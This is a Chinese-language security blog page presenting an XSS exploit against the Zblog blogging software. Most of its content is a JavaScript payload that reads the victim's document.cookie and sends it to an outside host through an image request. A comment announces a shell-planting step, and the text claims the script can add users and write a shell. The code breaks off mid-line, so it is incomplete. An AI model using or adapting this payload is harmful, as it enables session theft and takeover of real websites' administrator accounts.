首页 > 网络安全 > 漏洞分析

Zblog最新跨站漏洞及利用代码

admin 漏洞分析 2022-02-17 09:46:49 漏洞分析代码利用漏洞最新 &rdquo cookie //get document.cookie"

　　Js里可以写shell，添加用户，偷取COOKIE然后模拟出真正的转向

　　xmlhttp=poster();

　　cookie=document.cookie;

　　login=cookie.indexOf(‘password’)==-1?0:1;

　　tolocation=’https://www.jb51.net/’;

　　//get cookie

　　x=new Image();

　　x.src=”www.dosjj.com/c.php?c=”+escape(document.cookie);

　　//get a shell

　　data=”txaContent=

版权声明

本文仅代表作者观点，不代表本站立场。
本文系作者授权发表，未经许可，不得转载。
本文地址：/websafe/loudongfenxi/149509.html

上一篇 : xyxcms v1.3 小游戏CMS 漏洞说明

下一篇 : phpcms V9 BLind SQL 注入漏洞0day

留言与评论（共有 0 条评论）

QR Code

潘少俊衡

| 桂ICP备2023010378号-4

Powered By EmpireCMS

桂ICP备2023010378号-4

桂公网备 45012202000125号

使用手机软件扫描微信二维码

关注我们可获取更多热点资讯

感谢潘少俊衡友情技术支持